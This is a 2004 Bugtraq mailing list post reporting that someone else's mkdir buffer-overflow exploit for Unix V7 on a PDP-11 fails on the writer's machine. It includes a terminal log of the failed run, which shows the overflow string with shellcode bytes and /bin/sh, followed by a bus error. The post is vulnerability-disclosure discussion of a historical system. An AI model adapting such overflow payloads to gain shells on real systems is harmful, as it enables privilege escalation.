|
Bugtraq
mailing list archives
Mkdir exploit for PDP-11 doesn't work
From: Jonathan S <js () apollo gti net>
Date: Wed, 9 Jun 2004 18:36:31 -0400 (EDT)
Tim Newsham is right that there is an overflow present, but his exploit
doesn't work (for me - it may work fine on his PDP-11 or emu). A bus
error is what happens, which is a good sign that the return address needs
to be changed. It sucks that there aren't very many tools in UnixV7,
including text editors.
Here's the log of me executing the code he posted (I'll probably have it
fixed so it works in 5 minutes, with any luck):
$ pwd
/tmp
$ ./id
ruid=7 rgid=3
$ ./mkdir_exp
mkdir: cannot access
A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.AeVB.Be
x2
B.!
C.!.D.a.!.!.; I.I.I.I.I./bin/shaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ~/.
Bus error - core dumped
$ ./id
ruid=7 rgid=3
$
Sincerely,
Jonathan Stuart, CISSP
js () gti net (personal)
 By Date 
By Thread
Current thread:
- Mkdir exploit for PDP-11 doesn't work Jonathan S (Jun 10)
|
Intro
